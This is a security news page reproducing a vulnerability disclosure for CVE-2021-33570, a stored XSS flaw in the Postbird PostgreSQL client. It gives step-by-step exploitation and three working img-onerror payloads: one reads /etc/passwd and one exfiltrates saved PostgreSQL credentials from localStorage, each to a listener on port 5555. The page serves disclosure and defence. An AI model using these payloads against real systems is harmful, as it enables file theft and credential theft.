Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2021-33570: GitHub - Tridentsec-io/postbird

Postbird 0.8.4 allows stored XSS via the onerror attribute of an IMG element in any PostgreSQL database table. This can result in reading local files via vectors involving XMLHttpRequest and open of a file:/// URL, or discovering PostgreSQL passwords via vectors involving Window.localStorage and savedConnections.

CVE
#sql#xss#vulnerability#web#js#git#java#postgres

Postbird [CVE-2021-33570]

On 17th May 2021, a stored XSS vulnerability was discovered by the Tridentsec team in the Postbird application version - 0.8.4. The vulnerability was very Critical and exploiting the vulnerability can lead to Data Breach. We were able to inject malicious JavaScript into the application, leading us to two other vulnerabilities, Local File Inclusion(LFI) and PostgreSQL Password Stealing. Postbird is a cross-platform PostgreSQL GUI client built on electron.js framework, widely used by many organizations as well as individuals.

Exploitation

In order to exploit the vulnerability, we need to inject a malicious JavaScript payload in any table which is present in the PostgreSQL database. When the table loads in the Postbird application the JavaScript code automatically gets executed in the background. A hacker can save this JavaScript code from a website that saves the raw HTML code into the database and steal the files & PostgreSQL credentials in a real scenario.

Run our postbird.py Proof-of-Concept code before executing the attack. postbird.py is acting as a fake malicious server deployed by hackers to steal data.

Follow the below steps to exploit the vulnerability:

  • Open Postbird application.
  • Input the payload into any table as data.
  • Deploy our postbird.py Proof-of-Concept code using command python3 postbird.py
  • Reload the table/application to trigger the vulnerability.
  • Check the data received on the postbird.py server.

XSS Payload

<img src="" onerror="var xhttp = new XMLHttpRequest();xhttp.open('GET’, 'http://127.0.0.1 :5555/?xss=’+JSON.stringify(navigator.appVersion), true);xhttp.send();">

LFI Payload

<img src="" onerror="var xhttp = new XMLHttpRequest();xhttp.open('GET’, 'file:///etc/passwd’, false);xhttp.send();var res = xhttp.response;xhttp.open('GET’, 'http://127.0.0.1 :5555/?file=’+JSON.stringify(res), true);xhttp.send();">

PostgreSQL Password Stealing Payload

<img src="" onerror="var xhttp = new XMLHttpRequest();xhttp.open('GET’, 'http://127.0.0.1 :5555/?credentials=’+window.localStorage.savedConnections, true);xhttp.send();">

References:

  • CVE-2021-33570
  • https://nvd.nist.gov/vuln/detail/CVE-2021-33570
  • https://github.com/Tridentsec-io/postbird
  • https://www.exploit-db.com/exploits/49910
  • Paxa/postbird#132
  • Paxa/postbird#133
  • Paxa/postbird#134

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE-2023-6905
CVE-2023-6903
CVE-2023-6904
CVE-2023-3907